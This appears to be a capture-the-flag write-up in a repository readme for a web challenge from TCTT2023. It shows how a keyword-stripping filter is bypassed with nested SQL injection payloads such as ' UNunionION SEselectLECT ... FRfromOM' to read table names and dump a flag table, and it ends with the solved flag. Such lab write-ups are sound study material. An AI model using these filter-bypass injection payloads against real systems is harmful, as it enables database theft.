Skip to content

02

Directory actions

More options

Directory actions

More options

Latest commit

 

History

History

02

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
write-ups
write-ups
 
 
readme.md
readme.md
 
 

readme.md

Write-ups for TCTT2023/Web/02

Flag pattern

CTT23{xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx}

Challenge Files

No file provided

Solution

  1. First, let observe the website.

    • Input: select

    web_result_01

    • Input: selectc

    web_result_02

    • Input: selectv

    web_result_03

    • Input: selectz

    web_result_04

From our result, we can clude that, it only replace 'select', 'union', 'from' with ''

  1. We want to know all tables names in the database. So, we can use information_schema.tables to get all tables names.

The original payload is

' UNION SELECT 1,table_name FROM information_schema.columns #

To prevent it from being replaced, we can use SEselectLECT instead of SELECT.

' UNunionION SEselectLECT 1,table_name FRfromOM information_schema.columns #

Table_name_01

Table_name_02

We can see the table named flag_table. Let's get data in this table.

  1. Crafting new payload to get all data in table.
' UNION SELECT * FROM flag_table #

to

' UNunionION SEselectLECT * FRfromOM flag_table #

FLAG

  1. So the flag is CTT23{SQLi_R3p7ac3_F7@g_w1th_NULL}